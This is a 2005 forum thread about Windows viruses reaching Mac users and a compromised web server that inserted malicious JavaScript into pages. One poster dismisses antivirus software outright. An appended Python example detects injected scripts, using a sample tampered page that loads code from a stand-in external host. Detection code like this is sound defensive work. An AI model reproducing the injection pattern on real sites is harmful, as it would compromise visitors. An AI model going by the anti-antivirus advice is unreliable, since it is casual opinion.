MisterMe
Apr 2, 2005, 12:23 AM
How will the virus spread if you connect to a windows network? You have to physically move the file yourself. And why would you forward an e-mail containing a virus (it's not like you need an anti virus program to spot them)? That doesn't make any sense...

What in God's name are you talking about? Cybernanga is exactly correct. Antivirus software on the Mac prevents your becoming an inadvertent carrier of Windows viruses. He did not say that Windows viruses can be executed on the Mac. However, antivirus software will disinfect files that originated on Windows computers and warn that the virus exists. Your notion that you can spot an infected file by sight is just silly.

Personal Example: One of my colleagues had to do a PowerPoint presentation. His Windows laptop failed a few minutes before he was to go on. I pressed my PowerBook into service to aid him. He loaded his .ppt file on my computer and gave the presentation without a hitch. Later, I installed antivirus software on the PowerBook. The software revealed that the .ppt file was infected with a rather common Windows virus. It is possible that the virus caused the Windows laptop to fail in the first place. Although it was too late for my colleague, the antivirus program disinfected the file. At any rate, if antivirus software had been installed on my computer at the time, I would have known about the virus. I could have explained to my colleague that his Windows computer was infected. I could have scolded him about not properly protecting it. You see, in the real world where people work together, having a Windows computer down because of a virus creates problems for everyone. Although I was happy to be able to help my Windows-using colleague, his virus infection created extra work for me.

reckless_0001
Apr 7, 2005, 01:31 PM
That's why web hosting servers should all be unix based.. :D

wdlove
Apr 7, 2005, 07:41 PM
It's a win32 virus.

It cannot harm your mac.

Don't worry, there are still no OS X viruses.

Thank you, because for some reason I'm receiving at least one or two of them a day. So I have just been deleting them.

7on
Apr 7, 2005, 08:09 PM
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

And I wouldn't bother myself with anti-virus. It's not your job on the line because a co-worker couldn't get his ppt working. Anti-virus programs just take up system resources and hdd space. And they are stupid.

Makosuke
Apr 7, 2005, 09:15 PM
That's why web hosting servers should all be unix based.. :D

If that was meant as a dig against IIS, then you shouldn't get overconfident--this particular attack was specifically directed against Linux servers running Apache, as in this case (though the original exploit took advantage of an IIS hole, I believe).

There's no particular reason that it couldn't have targeted UNIX as well--once the server is compromised (which this one was), there's nothing stopping the attacker from installing something to do an exploit like this (randomly insert malicious JS into pages served) regardless of what the server is running (this page has a PDF that explains how a similar attack was carried out: http://vitalsecurity.org/sp2phase3.htm ).

Not to say that *nix and Apache aren't more secure than Win and IIS, but they're not immune to exploits if they're not managed properly (which, based on the "old server" comment earlier in this thread, it sounds like this one wasn't).

I didn't see this thread when it was first posted, but it's a very interesting read.
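One way a site owner can catch the kind of tampering described in this thread, as an added example rather than code from the thread or from any poster: the HTML actually served for a URL is compared with the on-disk source file, and any `<script>` element the file does not contain is reported, along with whether it loads from a host other than the site's own. The HTML, the host names and the `OWN_HOSTS` allowlist below are constructed placeholders.

```python
"""Flag <script> elements present in a served page but absent from its source file."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Record (src, inline body) for every <script> element, in document order."""

    def __init__(self):
        super().__init__()
        self.scripts, self._in_script, self._src, self._buf = [], False, None, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._src, self._buf = True, dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._in_script:  # HTMLParser delivers script text through handle_data
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._in_script = False


def collect_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def injected_scripts(original_html, served_html, own_hosts):
    """Scripts in the served page that the source file does not contain; each
    finding notes whether the script loads from a host outside own_hosts."""
    expected = set(collect_scripts(original_html))
    findings = []
    for src, body in collect_scripts(served_html):
        if (src, body) in expected:
            continue  # the same script exists in the source file
        host = urlsplit(src).hostname if src else None
        findings.append({"src": src, "inline": body[:60],
                         "external_host": host is not None and host not in own_hosts})
    return findings


# Constructed sample: the on-disk file and a tampered response for the same URL.
ORIGINAL_HTML = '<html><head><script src="/site.js"></script></head><body><p>Hi</p></body></html>'
SERVED_HTML = ('<html><head><script src="http://injected.example/x.js"></script>'
               '<script src="/site.js"></script></head>'
               '<body><p>Hi</p><script>var marker = 1;</script></body></html>')
OWN_HOSTS = {"www.example.org"}  # hosts allowed to serve this site's scripts
```

Running `injected_scripts(ORIGINAL_HTML, SERVED_HTML, OWN_HOSTS)` over the sample reports the external script and the inline one, and nothing for the legitimate `/site.js`; in practice the served copy would come from fetching the page over the network and the original from the document root.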